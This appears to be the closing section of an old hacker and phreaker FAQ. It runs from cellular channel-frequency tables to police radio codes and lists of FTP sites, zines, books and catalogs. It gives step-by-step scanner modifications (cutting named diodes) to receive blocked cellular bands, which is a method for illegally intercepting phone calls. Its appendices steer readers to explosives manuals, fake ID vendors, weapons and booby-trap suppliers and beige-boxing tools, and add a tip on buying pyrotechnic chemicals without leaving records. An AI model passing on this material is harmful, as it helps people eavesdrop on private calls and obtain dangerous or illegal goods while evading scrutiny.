     833.940   833.910   833.880   833.850   833.820   833.790   833.760

 3      277       276       275       274       273       272       271
     878.310   878.280   878.250   878.220   878.190   878.160   878.130
     833.310   833.280   833.250   833.220   833.190   833.160   833.130

 4      256       255       254       253       252       251       250
     877.680   877.650   877.620   877.590   877.560   877.530   877.500
     832.680   832.650   832.620   832.590   832.560   832.530   832.500

 5      235       234       233       232       231       230       229
     877.050   877.020   876.990   876.960   876.930   876.900   876.870
     832.050   832.020   831.990   831.960   831.930   831.900   831.870

 6      214       213       212       211       210       209       208
     876.420   876.390   876.360   876.330   876.300   876.270   876.240
     831.420   831.390   831.360   831.330   831.300   831.270   831.240

 7      193       192       191       190       189       188       187
     875.790   875.760   875.730   875.700   875.670   875.640   875.610
     830.790   830.760   830.730   830.700   830.670   830.640   830.610

 8      172       171       170       169       168       167       166
     875.160   875.130   875.100   875.070   875.040   875.010   874.980
     830.160   830.130   830.100   830.070   830.040   830.010   829.980

 9      151       150       149       148       147       146       145
     874.530   874.500   874.470   874.440   874.410   874.380   874.350
     829.530   829.500   829.470   829.440   829.410   829.380   829.350

10      130       129       128       127       126       125       124
     873.900   873.870   873.840   873.810   873.780   873.750   873.720
     828.900   828.870   828.840   828.810   828.780   828.750   828.720

11      109       108       107       106       105       104       103
     873.270   873.240   873.210   873.180   873.150   873.120   873.090
     828.270   828.240   828.210   828.180   828.150   828.120   828.090

12       88        87        86        85        84        83        82
     872.640   872.610   872.580   872.550   872.520   872.490   872.460
     827.640   827.610   827.580   827.550   827.520   827.490   827.460

13       67        66        65        64        63        62        61
     872.010   871.980   871.950   871.920   871.890   871.860   871.830
     827.010   826.980   826.950   826.920   826.890   826.860   826.830

14       46        45        44        43        42        41        40
     871.380   871.350   871.320   871.290   871.260   871.230   871.200
     826.380   826.350   826.320   826.290   826.260   826.230   826.200

15       25        24        23        22        21        20        19
     870.750   870.720   870.690   870.660   870.630   870.600   870.570
     825.750   825.720   825.690   825.660   825.630   825.600   825.570

16        4         3         2         1
     870.120   870.090   870.060   870.030
     825.120   825.090   825.060   825.030


FOR BAND B
==========

                                      Cell #
Chan     1         2         3         4         5         6         7

 1      334       335       336       337       338       339       340
     880.020   880.050   880.080   880.110   880.140   880.170   880.200
     835.020   835.050   835.080   835.110   835.140   835.170   835.200

 2      355       356       357       358       359       360       361
     880.650   880.680   880.710   880.740   880.770   880.800   880.830
     835.650   835.680   835.710   835.740   835.770   835.800   835.830

 3      376       377       378       379       380       381       382
     881.280   881.310   881.340   881.370   881.400   881.430   881.460
     836.280   836.310   836.340   836.370   836.400   836.430   836.460

 4      397       398       399       400       401       402       403
     881.910   881.940   881.970   882.000   882.030   882.060   882.090
     836.910   836.940   836.970   837.000   837.030   837.060   837.090

 5      418       419       420       421       422       423       424
     882.540   882.570   882.600   882.630   882.660   882.690   882.720
     837.540   837.570   837.600   837.630   837.660   837.690   837.720

 6      439       440       441       442       443       444       445
     883.170   883.200   883.230   883.260   883.290   883.320   883.350
     838.170   838.200   838.230   838.260   838.290   838.320   838.350

 7      460       461       462       463       464       465       466
     883.800   883.830   883.860   883.890   883.920   883.950   883.980
     838.800   838.830   838.860   838.890   838.920   838.950   838.980

 8      481       482       483       484       485       486       487
     884.430   884.460   884.490   884.520   884.550   884.580   884.610
     839.430   839.460   839.490   839.520   839.550   839.580   839.610

 9      502       503       504       505       506       507       508
     885.060   885.090   885.120   885.150   885.180   885.210   885.240
     840.060   840.090   840.120   840.150   840.180   840.210   840.240

10      523       524       525       526       527       528       529
     885.690   885.720   885.750   885.780   885.810   885.840   885.870
     840.690   840.720   840.750   840.780   840.810   840.840   840.870

11      544       545       546       547       548       549       550
     886.320   886.350   886.380   886.410   886.440   886.470   886.500
     841.320   841.350   841.380   841.410   841.440   841.470   841.500

12      565       566       567       568       569       570       571
     886.950   886.980   887.010   887.040   887.070   887.100   887.130
     841.950   841.980   842.010   842.040   842.070   842.100   842.130

13      586       587       588       589       590       591       592
     887.580   887.610   887.640   887.670   887.700   887.730   887.760
     842.580   842.610   842.640   842.670   842.700   842.730   842.760

14      607       608       609       610       611       612       613
     888.210   888.240   888.270   888.300   888.330   888.360   888.390
     843.210   843.240   843.270   843.300   843.330   843.360   843.390

15      628       629       630       631       632       633       634
     888.840   888.870   888.900   888.930   888.960   888.990   889.020
     843.840   843.870   843.900   843.930   843.960   843.990   844.020

16      649       650       651       652       653       654       655
     889.470   889.500   889.530   889.560   889.590   889.620   889.650
     844.470   844.500   844.530   844.560   844.590   844.620   844.650


                                      Cell #
Chan     8         9        10        11        12        13        14

 1      341       342       343       344       345       346       347
     880.230   880.260   880.290   880.320   880.350   880.380   880.410
     835.230   835.260   835.290   835.320   835.350   835.380   835.410

 2      362       363       364       365       366       367       368
     880.860   880.890   880.920   880.950   880.980   881.010   881.040
     835.860   835.890   835.920   835.950   835.980   836.010   836.040

 3      383       384       385       386       387       388       389
     881.490   881.520   881.550   881.580   881.610   881.640   881.670
     836.490   836.520   836.550   836.580   836.610   836.640   836.670

 4      404       405       406       407       408       409       410
     882.120   882.150   882.180   882.210   882.240   882.270   882.300
     837.120   837.150   837.180   837.210   837.240   837.270   837.300

 5      425       426       427       428       429       430       431
     882.750   882.780   882.810   882.840   882.870   882.900   882.930
     837.750   837.780   837.810   837.840   837.870   837.900   837.930

 6      446       447       448       449       450       451       452
     883.380   883.410   883.440   883.470   883.500   883.530   883.560
     838.380   838.410   838.440   838.470   838.500   838.530   838.560

 7      467       468       469       470       471       472       473
     884.010   884.040   884.070   884.100   884.130   884.160   884.190
     839.010   839.040   839.070   839.100   839.130   839.160   839.190

 8      488       489       490       491       492       493       494
     884.640   884.670   884.700   884.730   884.760   884.790   884.820
     839.640   839.670   839.700   839.730   839.760   839.790   839.820

 9      509       510       511       512       513       514       515
     885.270   885.300   885.330   885.360   885.390   885.420   885.450
     840.270   840.300   840.330   840.360   840.390   840.420   840.450

10      530       531       532       533       534       535       536
     885.900   885.930   885.960   885.990   886.020   886.050   886.080
     840.900   840.930   840.960   840.990   841.020   841.050   841.080

11      551       552       553       554       555       556       557
     886.530   886.560   886.590   886.620   886.650   886.680   886.710
     841.530   841.560   841.590   841.620   841.650   841.680   841.710

12      572       573       574       575       576       577       578
     887.160   887.190   887.220   887.250   887.280   887.310   887.340
     842.160   842.190   842.220   842.250   842.280   842.310   842.340

13      593       594       595       596       597       598       599
     887.790   887.820   887.850   887.880   887.910   887.940   887.970
     842.790   842.820   842.850   842.880   842.910   842.940   842.970

14      614       615       616       617       618       619       620
     888.420   888.450   888.480   888.510   888.540   888.570   888.600
     843.420   843.450   843.480   843.510   843.540   843.570   843.600

15      635       636       637       638       639       640       641
     889.050   889.080   889.110   889.140   889.170   889.200   889.230
     844.050   844.080   844.110   844.140   844.170   844.200   844.230

16      656       657       658       659       660       661       662
     889.680   889.710   889.740   889.770   889.800   889.830   889.860
     844.680   844.710   844.740   844.770   844.800   844.830   844.860


                                      Cell #
Chan    15        16        17        18        19        20        21

 1      348       349       350       351       352       353       354
     880.440   880.470   880.500   880.530   880.560   880.590   880.620
     835.440   835.470   835.500   835.530   835.560   835.590   835.620

 2      369       370       371       372       373       374       375
     881.070   881.100   881.130   881.160   881.190   881.220   881.250
     836.070   836.100   836.130   836.160   836.190   836.220   836.250

 3      390       391       392       393       394       395       396
     881.700   881.730   881.760   881.790   881.820   881.850   881.880
     836.700   836.730   836.760   836.790   836.820   836.850   836.880

 4      411       412       413       414       415       416       417
     882.330   882.360   882.390   882.420   882.450   882.480   882.510
     837.330   837.360   837.390   837.420   837.450   837.480   837.510

 5      432       433       434       435       436       437       438
     882.960   882.990   883.020   883.050   883.080   883.110   883.140
     837.960   837.990   838.020   838.050   838.080   838.110   838.140

 6      453       454       455       456       457       458       459
     883.590   883.620   883.650   883.680   883.710   883.740   883.770
     838.590   838.620   838.650   838.680   838.710   838.740   838.770

 7      474       475       476       477       478       479       480
     884.220   884.250   884.280   884.310   884.340   884.370   884.400
     839.220   839.250   839.280   839.310   839.340   839.370   839.400

 8      495       496       497       498       499       500       501
     884.850   884.880   884.910   884.940   884.970   885.000   885.030
     839.850   839.880   839.910   839.940   839.970   840.000   840.030

 9      516       517       518       519       520       521       522
     885.480   885.510   885.540   885.570   885.600   885.630   885.660
     840.480   840.510   840.540   840.570   840.600   840.630   840.660

10      537       538       539       540       541       542       543
     886.110   886.140   886.170   886.200   886.230   886.260   886.290
     841.110   841.140   841.170   841.200   841.230   841.260   841.290

11      558       559       560       561       562       563       564
     886.740   886.770   886.800   886.830   886.860   886.890   886.920
     841.740   841.770   841.800   841.830   841.860   841.890   841.920

12      579       580       581       582       583       584       585
     887.370   887.400   887.430   887.460   887.490   887.520   887.550
     842.370   842.400   842.430   842.460   842.490   842.520   842.550

13      600       601       602       603       604       605       606
     888.000   888.030   888.060   888.090   888.120   888.150   888.180
     843.000   843.030   843.060   843.090   843.120   843.150   843.180

14      621       622       623       624       625       626       627
     888.630   888.660   888.690   888.720   888.750   888.780   888.810
     843.630   843.660   843.690   843.720   843.750   843.780   843.810

15      642       643       644       645       646       647       648
     889.260   889.290   889.320   889.350   889.380   889.410   889.440
     844.260   844.290   844.320   844.350   844.380   844.410   844.440

16      663       664       665       666
     889.890   889.920   889.950   889.980
     844.890   844.920   844.950   844.980

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?
1.  Buy an older scanner before they stopped them from receiving the
    necessary freqs (look at garage sales)
2.  For a Realistic PRO-2004 open the case and cut one leg of D-513.
3.  For a Realistic PRO-2005 open the case and cut one leg of D-502.
4.  For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
    and 869-896 MHz.
5.  Get the "Scanner Modification Handbook" volumes I and II by Bill
    Cheek from Comunications Electronics Inc. (313)996-8888.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?

There are books available at Radio Shack for about $8 that list all
of the freqs used by area.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?

10-00 Series Code

10-0      Exercise great caution.
10-1      Reception is poor.
10-2      Reception is good.
10-3      Stop transmitting.
10-4      Message received.
10-5      Relay message.
10-6      Change channel.
10-7      Out of service/unavailable for assignment.
10-7A     Out of service at home.
10-7B     Out of service - personal.
10-7OD    Out of service - off duty
10-8      In service/available for assignment.
10-9      Repeat last transmission.
10-10     Off duty.
10-10A    Off duty at home.
10-11     Identify this frequency.
10-12     Visitors are present (be discrete).
10-13     Advise weather and road conditions.
10-14     Citizen holding suspect.
10-15     Prisoner in custody.
10-16     Pick up prisoner.
10-17     Request for gasoline.
10-18     Equipment exchange.
10-19     Return/returning to the station.
10-20     Location?
10-21     Telephone:______
10-21A    Advise home that I will return at ______.
10-21B    Phone your home
10-21R    Phone radio dispatch
10-22     Disregard the last assignment.
10-22C    Leave area if all secure; responsible person/owner is
          enroute.
10-23     Standby.
10-24     Request car-to-car transmission.
10-25     Do you have contact with _______?
10-26     Clear.
10-27     Driver's license check.
10-28     Vehicle registration request.
10-29     Check wants/warrants.[vehicle] (PIN,SVS)
10-29a    Check wants/warrants [subject] (PIN)
10-29c    Check complete [subject]
10-29f    The subject is wanted for a felony.
10-29h    Caution - severe hazard potential.
10-29r    Check wants/record [subject  (PIN,CJIC)
10-29m    The subject is wanted for a misdemeanor.
10-29v    The vehicle is wanted in connection with a possible crime.
10-30     Does not conform to regulations.
10-32     Drowning.
10-33     Alarm sounding.
10-34     Assist at office.
10-35     Time check.
10-36     Confidential information.
10-37     Identify the operator.
10-39     Can ______ come to the radio?
10-40     Is ______ available for a telephone call?
10-42     Check on the welfare of/at ______.
10-43     Call a doctor.
10-45     What is the condition of the patient?
10-45A    Condition of patient is good.
10-45B    Condition of patient is serious.
10-45C    Condition of patient is critical.
10-45D    Patient is deceased.
10-46     Sick person [amb. enroute]
10-48     Ambulance transfer call
10-49     Proceed to/Enroute to ______.
10-50     Subject is under the influence of narcotics./Take a report.
10-51     Subject is drunk.
10-52     Resuscitator is needed.
10-53     Person down.
10-54     Possible dead body.
10-55     This is a coroner's case.
10-56     Suicide.
10-56A    Suicide attempt.
10-57     Firearm discharged.
10-58     Garbage complaint
10-59     Security check./Malicious mischief
10-60     Lock out.
10-61     Miscellaneous public service.
10-62     Meet a citizen.
10-62A    Take a report from a citizen.
10-62B    Civil standby.
10-63     Prepare to copy.
10-64     Found property.
10-65     Missing person
10-66     Suspicious person.
10-67     Person calling for help.
10-68     Call for police made via telephone.
10-70     Prowler.
10-71     Shooting.
10-72     Knifing.
10-73     How do you receive?
10-79     Bomb threat.
10-80     Explosion.
10-86     Any traffic?
10-87     Meet the officer at ______.
10-88     Fill with the officer/Assume your post.
10-91     Animal.
10-91a    Stray.
10-91b    Noisy animal.
10-91c    Injured animal.
10-91d    Dead animal.
10-91e    Animal bite.
10-91g    Animal pickup.
10-91h    Stray horse
10-91j    Pickup/collect ______.
10-91L    Leash law violation.
10-91V    Vicious animal.
10-95     Out of vehicle-pedestrian/ Requesting an I.D./Tech unit.
10-96     Out of vehicle-ped. send backup
10-97     Arrived at the scene.
10-98     Available for assignment.
10-99     Open police garage door
10-100    Civil disturbance - Mutual aid standby.
10-101    Civil disturbance - Mutual aid request.


11-00 Series Code

11-10     Take a report.
11-24     Abandoned automobile.
11-25     Traffic hazard.
11-26     Abandoned bicycle.
11-27     10-27 with the driver being held.
11-28     10-28 with the driver being held.
11-40     Advise if an ambulance is needed.
11-41     An ambulance is needed.
11-42     No ambulance is needed.
11-48     Furnish transportation.
11-51     Escort.
11-52     Funeral detail.
11-54     Suspicious vehicle.
11-55     Officer is being followed by automobile.
11-56     Officer is being followed by auto containing dangerous
          persons.
11-57     An unidentified auto appeared at the scene of the assignment.
11-58     Radio traffic is being monitored. Phone all non-routine
          messages.
11-59     Give intensive attention to high hazard/business areas.
11-60     Attack in a high hazard area.
11-65     Signal light is out.
11-66     Defective traffic light.
11-78     Aircraft accident.
11-79     Accident - ambulance has been sent.
11-80     Accident - major injuries.
11-81     Accident - minor injuries.
11-82     Accident - no injuries.
11-83     Accident - no details.
11-84     Direct traffic.
11-85     Tow truck required.
11-94     Pedestrian stop.
11-95     Routine traffic stop.
11-96     Checking a suspicious vehicle.
11-97     Time/security check on patrol vehicles.
11-98     Meet: _______
11-99     Officer needs help.


900 Series Codes

904       Fire.
904A      Automobile fire.
904B      Building fire.
904G      Grass fire.
909       Traffic problem; police needed.
910       Can handle this detail.
932       Turn on _______ mobile relay at _______.
933       Turn off mobile relay.
949       Burning inspection at _______.
950       Control burn in progress/about to begin/ended.
951       Need fire investigator.
952       Report on conditions.
953       Investigate smoke.
953A      Investigate gas.
954       Off the air at the scene of the fire.
955       Fire is under control.
956       Assignment not finished.
957       Delayed response of __ minutes.
980       Restrict calls to emergency only.
981       Resume normal traffic.
1000      Plane crash
3000      Road block


Other Codes

Code 1    Do so at your convenience.
Code 2    Urgent.
Code 3    Emergency/lights and siren.
Code 4    No further assistance is needed.
Code 5    Stakeout.
Code 6    Responding from a long distance.
Code 7    Mealtime.
Code 8    Request cover/backup.
Code 9    Set up a roadblock.
Code 10   Bomb threat
Code 12   Notify news media
Code 20   Officer needs assistance
Code 22   Restricted radio traffic
Code 30   Officer needs HELP - EMERGENCY!
Code 33   Mobile emergency - clear this radio channel.
Code 43   TAC forces committed.
AID       Public Safety Assistance


Phonetic Alphabet

A    Adam                N    Nora
B    Boy                 O    Ocean
C    Charles             P    Paul
D    David               Q    Queen
E    Edward              R    Robert
F    Frank               S    Sam
G    George              T    Tom
H    Henry               U    Union
I    Ida                 V    Victor
J    John                W    William
K    King                X    X-ray
L    Lincoln             Y    Yellow
M    Mary                Z    Zebra

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?

Vehicles

          Item           Example

     1.   Color          Red over black
     2.   Year           1984
     3.   Make           Cadillac
     4.   Body           Two door
     5.   License plate  6VWH926 (given phonetically!)


Persons
     1.   Name
     2.   Race
     3.   Sex
     4.   Age
     5.   Height
     6.   Weight
     7.   Hair color
     8.   Eye color
     9.   Complexion
     10.  Physical marks, tattoos, scars, limps, etc.
     11.  Clothing (head to feet)
          a.   Hat
          b.   Shirt;tie
          c.   Coat
          d.   Trousers
          e.   Socks
          f.   Shoes

=====================================================================
Appendix A. FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com    (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org                      /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu       /pub/mccoy/computer-underground/
black.ox.ac.uk                Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov             \ These two sites will give you
martini.eecs.umich.edu 3000  / whatever info you need about any city.


=====================================================================
Apendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers    (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip

Also try IRC #hack.  *** WARNING: May be lame at times!!! ***

=====================================================================
Appendix D. Publications and Zines

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600:The Hacker Quarterly

a technical journal put out by hackers

mail:                                email:
 2600                                      2600@well.sf.ca.us
 PO Box 752                                emmanuel@well.sf.ca.us
 Middle Island, NY  11953
 PH:516-751-2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK

The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED

The magazine of the cyberculture.

Email: subscription@wired.com
       info@wired.com

Or look for it on many newsstands.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fringe Ware Review

Email: fringeware@io.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Iron Feather Journal

Mail:
      IFJ
      PO Box 1905
      Boulder  CO   80306

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Groom Lake Desert Rat

Email: psychospy@aol.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Cybertek: The Cyberpunk Technical Journal

Mail:
      Cybertek
      PO Box 64
      Brewster  NY  10509

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

LineNoiz

Email: dodger@fubar.bk.psu.edu
                   with
       'subscription linenoiz <your.address>'
             in the body of the message

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For more info on Zines then check out Factsheet Five and
Factsheet Five Electronic.

email: jerod23@well.sf.ca.us

=====================================================================
Appendix E.  Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons.  Comprehensive.  VERY well
worth it to anyone into crypto.

Davis, Tenney L.: "Chemistry of Powder and Explosives."

Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)

Russell: "Computer Security Basics"

Cornwall: "The (New) Hacker's Handbook"

"Cyberpunk" (forget the authors)

Kochan & Wood: "UNIX System Security"

Spafford & Garfinkel: " Practical UNIX Security"

Stohl, Clifford: "The Cuckoo's Egg"

Gasser, Morrie: "Building a Secure Computer System

THE RAINBOW SERIES
     Can be obtained free from:
            INFOSEC Awareness Office
            National Computer Security Centre
            9800 Savage Road
            Fort George G. Meade, MD  20755-6000
            Tel: 1-301-766-8729

"The Improvised Munitions Manual"

=====================================================================
Appendix F. Files and Papers.

Morris & Thompson: "Password Security, A Case History"

Curry: "Improving the Security of your UNIX System"
                available via FTP as 'security-doc.tar.Z'

Klein: "Foiling the Cracker: A Survey of, and Improvements to,
        Password Security."
                 Archie search for 'Foiling'

Cheswick: "The Design of a Secure Internet Gateway"
                 available from research.att.com
                                /dist/Secure_Internet_Gateway.ps

Cheswick: "An Evening with Berford: in which a Cracker is Lured,
           Endured and Studied"
                  available from research.att.com
                                 /dist/berford.ps

Bellovin89: "Security Problems in the TCP/IP Protocol Suite"
                  available from research.att.com
                                 /dist/ipext.ps.Z

Bellovin91: "Limitations of the Kerberos Authentication System"
                  available from research.att.com

CERT: many various bits of info collected at cert.sei.cmu.edu

"Open Systems Security"
                  available from ajk.tele.fi(131.177.5.20)
                                 /PublicDocuments

RFC-1244: "The Site Security Handbook"

"The Terrorist's Handbook"
                  how to make various explosive, propellants and
                  ignitors and also how to apply and use them


=====================================================================
Appendix G.  Catalogs

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lockpicks
(from Belisarius)

You can get lockpicks from:

     American Systems
          2100 Roswell Road
     Suite 200C-223
     Marietta, GA 30062

Lock Pick Sets
==============
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.

Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Explosives and other underground stuff

Loompanics is one of the major distributors of material relating to
the underground including explosives.  You can get the catalog by
mailing:
          Loompanics  Unlim
          P.O. Box 1197
          Port Townsend, Wash 98368

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)


NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA  71135-5950
Phone: (318) 688-1365     FAX:  (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Weapons, explosives, survival gear.
(from CyberSorceror)

Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO  80439
(303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Paladin Press
PO Box 1307
Boulder, CO 80306

Enclose $2 for the publishers of the "Action Library".
Books on lockpicking, wiretapping, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)

  Their Customer Service Number is as follows:
          1-800-333-5102
  Their Hours are:
      9am-9pm,  Monday-Friday

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For beige boxing, data com cracking/patching tools try:
TIME MOTION TOOLS
12778 BROOKPRINTER PLACE
POWAY, CA 92064-6810

(619) 679-0303
(800) 779-8170

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Chemicals and lab equipment!!  Only requires SIGNATURE for proof of
age!
(from Neurophyre)

Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI  54220

Send a crisp $1 bill and a request for a catalog.  Tip:  Don't order
all your pyro stuff from here.  They DO keep records.  Be safe.


=====================================================================
Appendix H. PGP keys

None available currently ...

=====================================================================